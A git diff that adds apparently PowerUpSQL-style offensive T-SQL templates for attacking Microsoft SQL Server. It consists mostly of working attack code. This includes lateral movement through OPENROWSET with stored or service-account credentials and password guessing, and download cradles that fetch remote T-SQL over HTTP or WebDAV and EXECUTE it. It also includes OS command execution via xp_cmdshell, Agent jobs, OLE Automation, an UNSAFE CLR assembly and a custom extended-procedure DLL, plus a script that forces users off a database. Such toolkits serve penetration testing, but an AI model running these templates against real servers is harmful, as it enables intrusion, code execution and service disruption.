'Server=MSSQLSRV04\SQLSERVER2016;uid=test;password=test').master.dbo.sysdatabases + +-- You can also provide SQL Login creds if you want. It can potentially be used for password guessing. +select * FROM OpenDataSource('SQLOLEDB','Data Source=PFCDB05;User ID=pfcnormal;Password=pfcnormal').mydatabse.dbo.[MyTable] diff --git a/templates/tsql/Lateral-Movement-OpenRowSetBF.tsql b/templates/tsql/Lateral-Movement-OpenRowSetBF.tsql new file mode 100644 index 0000000..ab0e8b9 --- /dev/null +++ b/templates/tsql/Lateral-Movement-OpenRowSetBF.tsql @@ -0,0 +1,2 @@ +-- You can also provide SQL Login cred if you want. It can potentially be used for password guessing. +SELECT * FROM OPENROWSET('SQLOLEDB', 'Network=DBMSSOCN; Address=10.0.2.2;uid=foo; pwd=password', 'SELECT column1 FROM tableA') diff --git a/templates/tsql/Lateral-Movement-Shared-Svc-Account-OpenRowSet.tsql b/templates/tsql/Lateral-Movement-Shared-Svc-Account-OpenRowSet.tsql new file mode 100644 index 0000000..b671d1d --- /dev/null +++ b/templates/tsql/Lateral-Movement-Shared-Svc-Account-OpenRowSet.tsql @@ -0,0 +1,15 @@ +-- Enable advanced options +EXEC sp_configure 'show advanced options', 1 +RECONFIGURE +GO + +-- Enabled ad hoc queries +EXEC sp_configure 'ad hoc distributed queries', 1 +RECONFIGURE +GO + +-- Execute SQL query on a remote SQL Server as a sysadmin. This uses the SQL Server service account to authenticate to the remote SQL Server instance. +DECLARE @sql NVARCHAR(MAX) +set @sql = 'select a.* from openrowset(''SQLNCLI'', ''Server=SQLSERVER2;Trusted_Connection=yes;'', ''select * from master.dbo.sysdatabases'') as a' +select @sql +EXEC sp_executeSQL @sql diff --git a/templates/tsql/Lateral-Movement-Shared-Svc-Account-XpCmdShell.tsql b/templates/tsql/Lateral-Movement-Shared-Svc-Account-XpCmdShell.tsql new file mode 100644 index 0000000..5b39cf0 --- /dev/null +++ b/templates/tsql/Lateral-Movement-Shared-Svc-Account-XpCmdShell.tsql @@ -0,0 +1,12 @@ +-- Enable advanced options +EXEC sp_configure 'show advanced options', 1 +RECONFIGURE +GO + +-- Enabled xp_cmdshell +EXEC sp_configure 'xp_cmdshell', 1 +RECONFIGURE +GO + +-- Execute SQL query on a remote SQL Server as a sysadmin. This uses the SQL Server service account to authenticate to the remote SQL Server instance. +xp_cmdshell 'sqlcmd –E –S SQLServer2\Instance2 –Q "SELECT @@servername"' diff --git a/templates/tsql/New-TempTableSample.sql b/templates/tsql/New-TempTableSample.sql new file mode 100644 index 0000000..44a13d9 --- /dev/null +++ b/templates/tsql/New-TempTableSample.sql @@ -0,0 +1,46 @@ +-- Create sample table variables and local/global temp tables + +-- Create global temporary table +IF (OBJECT_ID('tempdb..##GlobalTempTbl') IS NULL) +CREATE TABLE ##GlobalTempTbl (Spy_id INT NOT NULL, SpyName text NOT NULL, RealName text NULL); + +-- Insert records global temporary table +INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (1,'Black Widow','Scarlett Johansson') +INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (2,'Ethan Hunt','Tom Cruise') +INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (3,'Evelyn Salt','Angelina Jolie') +INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (4,'James Bond','Sean Connery') +GO + +-- Query global temporary table +SELECT * +FROM ##GlobalTempTbl +GO + +-- Create local temporary table +IF (OBJECT_ID('tempdb..#LocalTempTbl') IS NULL) +CREATE TABLE #LocalTempTbl (Spy_id INT NOT NULL, SpyName text NOT NULL, RealName text NULL); +-- Insert records local temporary table +INSERT INTO #LocalTempTbl (Spy_id, SpyName, RealName) VALUES (1,'Black Widow','Scarlett Johansson') +INSERT INTO #LocalTempTbl (Spy_id, SpyName, RealName) VALUES (2,'Ethan Hunt','Tom Cruise') +INSERT INTO #LocalTempTbl (Spy_id, SpyName, RealName) VALUES (3,'Evelyn Salt','Angelina Jolie') +INSERT INTO #LocalTempTbl (Spy_id, SpyName, RealName) VALUES (4,'James Bond','Sean Connery') +GO +-- Query local temporary table +SELECT * +FROM #LocalTempTbl +GO + +-- Create table variable +If not Exists (SELECT name FROM tempdb.sys.objects WHERE name = 'table_variable') +DECLARE @table_variable TABLE (Spy_id INT NOT NULL, SpyName text NOT NULL, RealName text NULL); + +-- Insert records into table variable +INSERT INTO @table_variable (Spy_id, SpyName, RealName) VALUES (1,'Black Widow','Scarlett Johansson') +INSERT INTO @table_variable (Spy_id, SpyName, RealName) VALUES (2,'Ethan Hunt','Tom Cruise') +INSERT INTO @table_variable (Spy_id, SpyName, RealName) VALUES (3,'Evelyn Salt','Angelina Jolie') +INSERT INTO @table_variable (Spy_id, SpyName, RealName) VALUES (4,'James Bond','Sean Connery') + +-- Query table variable in same batch +SELECT * +FROM @table_variable +GO diff --git a/templates/tsql/Set-XpMsShipped.sql b/templates/tsql/Set-XpMsShipped.sql new file mode 100644 index 0000000..af1b9eb --- /dev/null +++ b/templates/tsql/Set-XpMsShipped.sql @@ -0,0 +1,25 @@ +-- This outlines how to set the "is_ms_shipped" flag to one for custom stored procedures in SQL Server. +-- Note: The following has to be executed as a sysadmin + +-- Create stored procedure +CREATE PROCEDURE sp_example +AS +BEGIN +SELECT @@Version +END + +-- Check properties of proc +SELECT name,is_ms_shipped FROM sys.procedures WHERE name = 'sp_example' + +-- Flag the procedure as a system object via a DAC connection via +-- Reference for incline DAC connection: https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/Get-DACQuery.sql + +-- Note: This changes the proc to a system object, but doesn't change from the dbo to sys schema. +-- Source: https://raresql.com/tag/sp_ms_marksystemobject/ + +exec sys.sp_ms_marksystemobject sp_example + +-- Check properties of proc +SELECT name,is_ms_shipped FROM sys.procedures WHERE name = 'sp_example' + +--Note: To remove the flag the procedures need to be dropped and recreated. diff --git a/templates/tsql/download_cradle_tsql_bulkinserver.sql b/templates/tsql/download_cradle_tsql_bulkinserver.sql new file mode 100644 index 0000000..b59f844 --- /dev/null +++ b/templates/tsql/download_cradle_tsql_bulkinserver.sql @@ -0,0 +1,22 @@ +-- Bulnk Insert - Download Cradle Example + +-- Setup variables +Declare @cmd varchar(8000) + +-- Create temp table +CREATE TABLE #file (content nvarchar(4000)); + +-- Read file into temp table - web server must support propfind +BULK INSERT #file FROM '\\sharepoint.acme.com@SSL\Path\to\file.txt'; + +-- Select contents of file +SELECT @cmd = content FROM #file + +-- Display command +SELECT @cmd + +-- Run command +EXECUTE(@cmd) + +-- Drop the temp table +DROP TABLE #file diff --git a/templates/tsql/download_cradle_tsql_oap.sql b/templates/tsql/download_cradle_tsql_oap.sql new file mode 100644 index 0000000..b60b071 --- /dev/null +++ b/templates/tsql/download_cradle_tsql_oap.sql @@ -0,0 +1,35 @@ +-- OLE Automation Procedure - Download Cradle Example +-- Does not require a table, but can't handle larger payloads + +-- Note: This also works with unc paths \\ip\file.txt +-- Note: This also works with webdav paths \\ip@80\file.txt However, the target web server needs to support propfind. + +-- Setup Variables +DECLARE @url varchar(300) +DECLARE @WinHTTP int +DECLARE @handle int +DECLARE @Command varchar(8000) + +-- Set target url containting TSQL +SET @url = 'http://127.0.0.1/mycmd.txt' + +-- Setup namespace +EXEC @handle=sp_OACreate 'WinHttp.WinHttpRequest.5.1',@WinHTTP OUT + +-- Call the Open method to setup the HTTP request +EXEC @handle=sp_OAMethod @WinHTTP, 'Open',NULL,'GET',@url,'false' + +-- Call the Send method to send the HTTP GET request +EXEC @handle=sp_OAMethod @WinHTTP,'Send' + +-- Capture the HTTP response content +EXEC @handle=sp_OAGetProperty @WinHTTP,'ResponseText', @Command out + +-- Destroy the object +EXEC @handle=sp_OADestroy @WinHTTP + +-- Display command +SELECT @Command + +-- Run command +EXECUTE (@Command) diff --git a/templates/tsql/download_cradle_tsql_oap2.sql b/templates/tsql/download_cradle_tsql_oap2.sql new file mode 100644 index 0000000..ac6687b --- /dev/null +++ b/templates/tsql/download_cradle_tsql_oap2.sql @@ -0,0 +1,43 @@ +-- OLE Automation Procedure - Download Cradle Example - Option 2 +-- Can handle larger payloads, but requires a table + +-- Note: This also works with unc paths \\ip\file.txt +-- Note: This also works with webdav paths \\ip@80\file.txt However, the target web server needs to support propfind. + +-- Setup Variables +DECLARE @url varchar(300) +DECLARE @WinHTTP int +DECLARE @Handle int +DECLARE @Command varchar(8000) + +-- Set target url containting TSQL +SET @url = 'http://127.0.0.1/mycmd.txt' + +-- Create temp table to store downloaded string +CREATE TABLE #text(html text NULL) + +-- Setup namespace +EXEC @Handle=sp_OACreate 'WinHttp.WinHttpRequest.5.1',@WinHTTP OUT + +-- Call open method to configure HTTP request +EXEC @Handle=sp_OAMethod @WinHTTP, 'Open',NULL,'GET',@url,'false' + +-- Call Send method to send the HTTP request +EXEC @Handle=sp_OAMethod @WinHTTP,'Send' + +-- Capture the HTTP response content +INSERT #text(html) +EXEC @Handle=sp_OAGetProperty @WinHTTP,'ResponseText' + +-- Destroy the object +EXEC @Handle=sp_OADestroy @WinHTTP + +-- Display the commad +SELECT @Command = html from #text +SELECT @Command + +-- Run the command +EXECUTE (@Command) + +-- Remove temp table +DROP TABLE #text diff --git a/templates/tsql/kick-sqllogins.tsql b/templates/tsql/kick-sqllogins.tsql new file mode 100644 index 0000000..33a2e5e --- /dev/null +++ b/templates/tsql/kick-sqllogins.tsql @@ -0,0 +1,35 @@ +-- This script can be use to kick existing users from a database. +-- Not recommended if you don't know what you're doing, and is generally a super bad idea if you're not a DBA. +-- Source: https://dba.stackexchange.com/questions/6031/how-do-you-kick-users-out-of-a-sql-server-2008-database + +--------------------- +-- Attack Process +--------------------- + +-- Select the master database +USE master; +GO + +-- Place the target database into single user mode (kick out other logins) +-- Change [dbname] to desire database name +ALTER DATABASE [dbname] SET SINGLE_USER WITH ROLLBACK IMMEDIATE; +GO + +-- Take the database offline (prevent sessions from re-establishing connection) +-- Change [dbname] to desire database name +-- Note: You dont want to do this if you need access to that database. + +ALTER DATABASE [dbname] SET OFFLINE; + +--------------------- +-- Restore Process +--------------------- + +-- Bring database back online +-- Change [dbname] to desire database name +-- Note: This should only be required if the database was taken offline +ALTER DATABASE [dbname] SET ONLINE; + +-- Enable multi user mode +-- Change [dbname] to desire database name +ALTER DATABASE [dbname] SET MULTI_USER; diff --git a/templates/tsql/oscmdexec_agentjob_activex_jscript.sql b/templates/tsql/oscmdexec_agentjob_activex_jscript.sql new file mode 100644 index 0000000..c506c7d --- /dev/null +++ b/templates/tsql/oscmdexec_agentjob_activex_jscript.sql @@ -0,0 +1,80 @@ +USE [msdb] +GO + +/****** Object: Job [OS COMMAND EXECUTION EXAMPLE - ActiveX: JSCRIPT] Script Date: 8/29/2017 11:17:16 AM ******/ +BEGIN TRANSACTION +DECLARE @ReturnCode INT +SELECT @ReturnCode = 0 +/****** Object: JobCategory [[Uncategorized (Local)]] Script Date: 8/29/2017 11:17:16 AM ******/ +IF NOT EXISTS (SELECT name FROM msdb.dbo.syscategories WHERE name=N'[Uncategorized (Local)]' AND category_class=1) +BEGIN +EXEC @ReturnCode = msdb.dbo.sp_add_category @class=N'JOB', @type=N'LOCAL', @name=N'[Uncategorized (Local)]' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback + +END + +DECLARE @jobId BINARY(16) +DECLARE @user varchar(8000) +SET @user = SYSTEM_USER +EXEC @ReturnCode = msdb.dbo.sp_add_job @job_name=N'OS COMMAND EXECUTION EXAMPLE - ActiveX: JSCRIPT', + @enabled=1, + @notify_level_eventlog=0, + @notify_level_email=0, + @notify_level_netsend=0, + @notify_level_page=0, + @delete_level=1, + @description=N'No description available.', + @category_name=N'[Uncategorized (Local)]', + @owner_login_name=@user, @job_id = @jobId OUTPUT +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +/****** Object: Step [RUN COMMAND - ActiveX: JSCRIPT] Script Date: 8/29/2017 11:17:16 AM ******/ +EXEC @ReturnCode = msdb.dbo.sp_add_jobstep @job_id=@jobId, @step_name=N'RUN COMMAND - ActiveX: JSCRIPT', + @step_id=1, + @cmdexec_success_code=0, + @on_success_action=1, + @on_success_step_id=0, + @on_fail_action=2, + @on_fail_step_id=0, + @retry_attempts=0, + @retry_interval=0, + @os_run_priority=0, @subsystem=N'ActiveScripting', + @command=N'function RunCmd() +{ + var objShell = new ActiveXObject("shell.application"); + objShell.ShellExecute("cmd.exe", "/c echo hello > c:\\windows\\temp\\blah.txt", "", "open", 0); + } + +RunCmd(); +', +/** alternative option + @command=N'function RunCmd() + { + var WshShell = new ActiveXObject("WScript.Shell"); + var oExec = WshShell.Exec("c:\\windows\\system32\\cmd.exe /c echo hello > c:\\windows\\temp\\blah.txt"); + oExec = null; + WshShell = null; + } + + RunCmd(); + ', + +**/ + @database_name=N'JavaScript', + @flags=0 + --,@proxy_name=N'WinUser1' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +EXEC @ReturnCode = msdb.dbo.sp_update_job @job_id = @jobId, @start_step_id = 1 +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +EXEC @ReturnCode = msdb.dbo.sp_add_jobserver @job_id = @jobId, @server_name = N'(local)' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +COMMIT TRANSACTION +GOTO EndSave +QuitWithRollback: + IF (@@TRANCOUNT > 0) ROLLBACK TRANSACTION +EndSave: + +GO + + +use msdb +EXEC dbo.sp_start_job N'OS COMMAND EXECUTION EXAMPLE - ActiveX: JSCRIPT' ; diff --git a/templates/tsql/oscmdexec_agentjob_activex_vbscript.sql b/templates/tsql/oscmdexec_agentjob_activex_vbscript.sql new file mode 100644 index 0000000..ad33b14 --- /dev/null +++ b/templates/tsql/oscmdexec_agentjob_activex_vbscript.sql @@ -0,0 +1,66 @@ +USE [msdb] +GO + +/****** Object: Job [OS COMMAND EXECUTION EXAMPLE - ActiveX: VBSCRIPT] Script Date: 8/29/2017 10:27:36 AM ******/ +BEGIN TRANSACTION +DECLARE @ReturnCode INT +SELECT @ReturnCode = 0 +/****** Object: JobCategory [[Uncategorized (Local)]] Script Date: 8/29/2017 10:27:36 AM ******/ +IF NOT EXISTS (SELECT name FROM msdb.dbo.syscategories WHERE name=N'[Uncategorized (Local)]' AND category_class=1) +BEGIN +EXEC @ReturnCode = msdb.dbo.sp_add_category @class=N'JOB', @type=N'LOCAL', @name=N'[Uncategorized (Local)]' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback + +END + +DECLARE @jobId BINARY(16) +DECLARE @user varchar(8000) +SET @user = SYSTEM_USER +EXEC @ReturnCode = msdb.dbo.sp_add_job @job_name=N'OS COMMAND EXECUTION EXAMPLE - ActiveX: VBSCRIPT', + @enabled=1, + @notify_level_eventlog=0, + @notify_level_email=0, + @notify_level_netsend=0, + @notify_level_page=0, + @delete_level=1, + @description=N'No description available.', + @category_name=N'[Uncategorized (Local)]', + @owner_login_name=@user, @job_id = @jobId OUTPUT +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +/****** Object: Step [RUN COMMAND - ActiveX: VBSCRIPT] Script Date: 8/29/2017 10:27:36 AM ******/ +EXEC @ReturnCode = msdb.dbo.sp_add_jobstep @job_id=@jobId, @step_name=N'RUN COMMAND - ActiveX: VBSCRIPT', + @step_id=1, + @cmdexec_success_code=0, + @on_success_action=1, + @on_success_step_id=0, + @on_fail_action=2, + @on_fail_step_id=0, + @retry_attempts=0, + @retry_interval=0, + @os_run_priority=0, @subsystem=N'ActiveScripting', + @command=N'FUNCTION Main() + +dim shell +set shell= CreateObject ("WScript.Shell") +shell.run("c:\windows\system32\cmd.exe /c echo hello > c:\windows\temp\blah.txt") +set shell = nothing + +END FUNCTION', + @database_name=N'VBScript', + @flags=0 + --,@proxy_name=N'WinUser1' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +EXEC @ReturnCode = msdb.dbo.sp_update_job @job_id = @jobId, @start_step_id = 1 +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +EXEC @ReturnCode = msdb.dbo.sp_add_jobserver @job_id = @jobId, @server_name = N'(local)' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +COMMIT TRANSACTION +GOTO EndSave +QuitWithRollback: + IF (@@TRANCOUNT > 0) ROLLBACK TRANSACTION +EndSave: + +GO + +use msdb +EXEC dbo.sp_start_job N'OS COMMAND EXECUTION EXAMPLE - ActiveX: VBSCRIPT' ; diff --git a/templates/tsql/oscmdexec_agentjob_cmdexec.sql b/templates/tsql/oscmdexec_agentjob_cmdexec.sql new file mode 100644 index 0000000..ec8629d --- /dev/null +++ b/templates/tsql/oscmdexec_agentjob_cmdexec.sql @@ -0,0 +1,58 @@ +USE [msdb] +GO + +/****** Object: Job [OS COMMAND EXECUTION EXAMPLE - CMDEXEC] Script Date: 8/29/2017 11:23:50 AM ******/ +BEGIN TRANSACTION +DECLARE @ReturnCode INT +SELECT @ReturnCode = 0 +/****** Object: JobCategory [[Uncategorized (Local)]] Script Date: 8/29/2017 11:23:50 AM ******/ +IF NOT EXISTS (SELECT name FROM msdb.dbo.syscategories WHERE name=N'[Uncategorized (Local)]' AND category_class=1) +BEGIN +EXEC @ReturnCode = msdb.dbo.sp_add_category @class=N'JOB', @type=N'LOCAL', @name=N'[Uncategorized (Local)]' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback + +END + +DECLARE @jobId BINARY(16) +DECLARE @user varchar(8000) +SET @user = SYSTEM_USER +EXEC @ReturnCode = msdb.dbo.sp_add_job @job_name=N'OS COMMAND EXECUTION EXAMPLE - CMDEXEC', + @enabled=1, + @notify_level_eventlog=0, + @notify_level_email=0, + @notify_level_netsend=0, + @notify_level_page=0, + @delete_level=1, + @description=N'No description available.', + @category_name=N'[Uncategorized (Local)]', + @owner_login_name=@user, @job_id = @jobId OUTPUT +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +/****** Object: Step [RUN COMMAND - CMDEXEC] Script Date: 8/29/2017 11:23:50 AM ******/ +EXEC @ReturnCode = msdb.dbo.sp_add_jobstep @job_id=@jobId, @step_name=N'RUN COMMAND - CMDEXEC', + @step_id=1, + @cmdexec_success_code=0, + @on_success_action=1, + @on_success_step_id=0, + @on_fail_action=2, + @on_fail_step_id=0, + @retry_attempts=0, + @retry_interval=0, + @os_run_priority=0, @subsystem=N'CmdExec', + @command=N'c:\windows\system32\cmd.exe /c echo hello > c:\windows\temp\blah.txt', + @flags=0 + --,@proxy_name=N'WinUser1' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +EXEC @ReturnCode = msdb.dbo.sp_update_job @job_id = @jobId, @start_step_id = 1 +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +EXEC @ReturnCode = msdb.dbo.sp_add_jobserver @job_id = @jobId, @server_name = N'(local)' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +COMMIT TRANSACTION +GOTO EndSave +QuitWithRollback: + IF (@@TRANCOUNT > 0) ROLLBACK TRANSACTION +EndSave: + +GO + +use msdb +EXEC dbo.sp_start_job N'OS COMMAND EXECUTION EXAMPLE - CMDEXEC' ; diff --git a/templates/tsql/oscmdexec_agentjob_powershell.sql b/templates/tsql/oscmdexec_agentjob_powershell.sql new file mode 100644 index 0000000..269a2c1 --- /dev/null +++ b/templates/tsql/oscmdexec_agentjob_powershell.sql @@ -0,0 +1,59 @@ +USE [msdb] +GO + +/****** Object: Job [OS COMMAND EXECUTION EXAMPLE - POWERSHELL] Script Date: 8/29/2017 11:28:39 AM ******/ +BEGIN TRANSACTION +DECLARE @ReturnCode INT +SELECT @ReturnCode = 0 +/****** Object: JobCategory [[Uncategorized (Local)]] Script Date: 8/29/2017 11:28:39 AM ******/ +IF NOT EXISTS (SELECT name FROM msdb.dbo.syscategories WHERE name=N'[Uncategorized (Local)]' AND category_class=1) +BEGIN +EXEC @ReturnCode = msdb.dbo.sp_add_category @class=N'JOB', @type=N'LOCAL', @name=N'[Uncategorized (Local)]' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback + +END + +DECLARE @jobId BINARY(16) +DECLARE @user varchar(8000) +SET @user = SYSTEM_USER +EXEC @ReturnCode = msdb.dbo.sp_add_job @job_name=N'OS COMMAND EXECUTION EXAMPLE - POWERSHELL', + @enabled=1, + @notify_level_eventlog=0, + @notify_level_email=0, + @notify_level_netsend=0, + @notify_level_page=0, + @delete_level=1, + @description=N'No description available.', + @category_name=N'[Uncategorized (Local)]', + @owner_login_name=@user, @job_id = @jobId OUTPUT +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +/****** Object: Step [RUN COMMAND - POWERHSHELL] Script Date: 8/29/2017 11:28:39 AM ******/ +EXEC @ReturnCode = msdb.dbo.sp_add_jobstep @job_id=@jobId, @step_name=N'RUN COMMAND - POWERHSHELL', + @step_id=1, + @cmdexec_success_code=0, + @on_success_action=1, + @on_success_step_id=0, + @on_fail_action=2, + @on_fail_step_id=0, + @retry_attempts=0, + @retry_interval=0, + @os_run_priority=0, @subsystem=N'PowerShell', + @command=N'write-output "hello world" | out-file c:\windows\temp\blah.txt', + @database_name=N'master', + @flags=0 + --,@proxy_name=N'WinUser1' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +EXEC @ReturnCode = msdb.dbo.sp_update_job @job_id = @jobId, @start_step_id = 1 +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +EXEC @ReturnCode = msdb.dbo.sp_add_jobserver @job_id = @jobId, @server_name = N'(local)' +IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback +COMMIT TRANSACTION +GOTO EndSave +QuitWithRollback: + IF (@@TRANCOUNT > 0) ROLLBACK TRANSACTION +EndSave: + +GO + +use msdb +EXEC dbo.sp_start_job N'OS COMMAND EXECUTION EXAMPLE - POWERSHELL' ; diff --git a/templates/tsql/oscmdexec_clr.sql b/templates/tsql/oscmdexec_clr.sql new file mode 100644 index 0000000..f96a895 --- /dev/null +++ b/templates/tsql/oscmdexec_clr.sql @@ -0,0 +1,70 @@ +-- Script: oscmdexec_clr.sql +-- Description: Create a .net assembly to execute os commands, import into sql server, and map to stored procedures. +-- https://blog.netspi.com/attacking-sql-server-clr-assemblies/ + +/* +// cmd_exec.dll +// C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\cmd_exec.cs + +using System; +using System.Data; +using System.Data.SqlClient; +using System.Data.SqlTypes; +using Microsoft.SqlServer.Server; +using System.IO; +using System.Diagnostics; +using System.Text; + +public partial class StoredProcedures +{ + [Microsoft.SqlServer.Server.SqlProcedure] + public static void cmd_exec (SqlString execCommand) + { + Process proc = new Process(); + proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe"; + proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Value); + proc.StartInfo.UseShellExecute = false; + proc.StartInfo.RedirectStandardOutput = true; + proc.Start(); + + // Create the record and specify the metadata for the columns. + SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NVarChar, 4000)); + + // Mark the beginning of the result set. + SqlContext.Pipe.SendResultsStart(record); + + // Set values for each column in the row + record.SetString(0, proc.StandardOutput.ReadToEnd().ToString()); + + // Send the row back to the client. + SqlContext.Pipe.SendResultsRow(record); + + // Mark the end of the result set. + SqlContext.Pipe.SendResultsEnd(); + + proc.WaitForExit(); + proc.Close(); + } +}; +*/ + +-- Select the msdb database +use msdb + +-- Enable show advanced options on the server +sp_configure 'show advanced options',1 +RECONFIGURE +GO +-- Enable clr on the server +sp_configure 'clr enabled',1 +RECONFIGURE +GO + +-- Import the assembly +CREATE ASSEMBLY my_assembly +FROM 'c:\Windows\temp\cmd_exec.dll' +WITH PERMISSION_SET = UNSAFE; + +-- Link the assembly to a stored procedure +CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec]; +GO diff --git a/templates/tsql/oscmdexec_customxp.cpp b/templates/tsql/oscmdexec_customxp.cpp new file mode 100644 index 0000000..469f363 --- /dev/null +++ b/templates/tsql/oscmdexec_customxp.cpp @@ -0,0 +1,35 @@ +# Register xp via local path: sp_addextendedproc 'RunPs', 'c:\myxp.dll' +# Register xp via UNC path: sp_addextendedproc 'RunPs', '\\servername\pathtofile\myxp.dll' +# Run: exec RunPs +# Unregister xp: sp_dropextendedproc 'RunPs' + + +#include "stdio.h" +#include "stdafx.h" +#include "srv.h" +#include "shellapi.h" +#include "string" + +BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { +switch (ul_reason_for_call) +{ + case DLL_PROCESS_ATTACH: + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + case DLL_PROCESS_DETACH: + break; +} + +return 1; + } + + __declspec(dllexport) ULONG __GetXpVersion() { +return 1; +} + +#define RUNCMD_FUNC extern "C" __declspec (dllexport) +RUNPS_FUNC int __stdcall RunPs(const char * Command) { +ShellExecute(NULL, TEXT("open"), TEXT("powershell"), TEXT(" -C \" 'This is a test.'|out-file c:\\temp\\test_ps2.txt \" "), TEXT(" C:\\ "), SW_SHOW); +system("PowerShell -C \"'This is a test.'|out-file c:\\temp\\test_ps1.txt\""); +return 1; +} diff --git a/templates/tsql/oscmdexec_oleautomationobject.sql b/templates/tsql/oscmdexec_oleautomationobject.sql new file mode 100644 index 0000000..83e1bd4 --- /dev/null +++ b/templates/tsql/oscmdexec_oleautomationobject.sql @@ -0,0 +1,45 @@ +-- This is a TSQL template for executing OS commands through SQL Server using OLE Automation Procedures. + +-- Enable Show Advanced Options +sp_configure 'Show Advanced Options',1 +RECONFIGURE +GO + +-- Enable OLE Automation Procedures +sp_configure 'Ole Automation Procedures',1 +RECONFIGURE +GO + +-- Execute Command via OLE and store output in temp file +DECLARE @Shell INT +DECLARE @Shell2 INT +EXEC Sp_oacreate 'wscript.shell', @Shell Output, 5 +EXEC Sp_oamethod @shell, 'run' , null, 'cmd.exe /c "echo Hello World > c:\windows\temp\file.txt"' + +-- Read results +DECLARE @libref INT +DECLARE @filehandle INT +DECLARE @FileContents varchar(8000) + +EXEC sp_oacreate 'scripting.filesystemobject', @libref out +EXEC sp_oamethod @libref, 'opentextfile', @filehandle out, 'c:\windows\temp\file.txt', 1 +EXEC sp_oamethod @filehandle, 'readall', @FileContents out + +SELECT @FileContents +GO + +-- Remove temp result file +DECLARE @Shell INT +EXEC Sp_oacreate 'wscript.shell', @Shell Output, 5 +EXEC Sp_oamethod @Shell, 'run' , null, 'cmd.exe /c "DEL c:\windows\temp\file.txt"' +GO + +-- Disable Show Advanced Options +sp_configure 'Show Advanced Options',1 +RECONFIGURE +GO + +-- Disable OLE Automation Procedures +sp_configure 'Ole Automation Procedures',1 +RECONFIGURE +GO diff --git a/templates/tsql/oscmdexec_openrowset.sql b/templates/tsql/oscmdexec_openrowset.sql new file mode 100644 index 0000000..d9bcf08 --- /dev/null +++ b/templates/tsql/oscmdexec_openrowset.sql @@ -0,0 +1,116 @@ +-- WORK IN PROGRESS +-- Targeting custom DSN via linked query (openquery), openrowset, opendatasource +-- Target xls and mdb variations +-- May require https://www.microsoft.com/en-us/download/details.aspx?id=13255 on modern version... +-- exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 + +-- Enable show advanced options +sp_configure 'show advanced options',1 +reconfigure +go + +-- Enable ad hoc queries +sp_configure 'ad hoc distributed queries',1 +reconfigure +go + +-- Verify the configuration change +select * from master.sys.configurations where name like '%ad%' + +-- Losen restrictions +-- EXEC sp_MSset_oledb_prop +EXEC sp_MSset_oledb_prop N'Microsoft.ACE.OLEDB.12.0', N'AllowInProcess', 1 +EXEC sp_MSset_oledb_prop N'Microsoft.ACE.OLEDB.12.0', N'DynamicParameters', 1 +EXEC sp_MSset_oledb_prop N'Microsoft.ACE.OLEDB.12.0' + +EXEC sp_MSset_oledb_prop N'Microsoft.Jet.OLEDB.4.0', N'AllowInProcess', 1 -- Errors +EXEC sp_MSset_oledb_prop N'Microsoft.Jet.OLEDB.4.0', N'DynamicParameters', 1 +EXEC sp_MSset_oledb_prop N'Microsoft.Jet.OLEDB.4.0' + +  +-- Create linked servers +-- Note: xp_dirtree could potentially be used to identify mdb or xls files on the database server +exec sp_addlinkedserver @server='Access_4', +@srvproduct='Access', +@provider='Microsoft.Jet.OLEDB.4.0', +@datasrc='C:\Windows\Temp\SystemIdentity.mdb' + +exec sp_addlinkedserver @server='Access_12', +@srvproduct='Access', +@provider='Microsoft.ACE.OLEDB.12.0', +@datasrc='C:\Windows\Temp\SystemIdentity.mdb' + +EXEC master.dbo.sp_addlinkedserver @server = N'excelxx', +@srvproduct=N'Excel', @provider=N'Microsoft.ACE.OLEDB.12.0', +@datasrc=N'C:\windows\temp\test.xls', @provstr=N'Excel 15.0' + +-- List linked servers +select * from master..sysservers + +-- Attempt queries +SELECT * from openquery([Access_4],'select 1') +SELECT * from openquery([Access_12],'select 1') +SELECT * from openquery([Access],'select shell("cmd.exe /c echo hello > c:\windows\temp\blah.txt")') +SELECT * FROM OPENROWSET('Microsoft.Jet.OLEDB.4.0','Excel 8.0;Database=C:\windows\temp\test.xls', 'SELECT * FROM [Sheet1$]') + +-- Drop linked servers 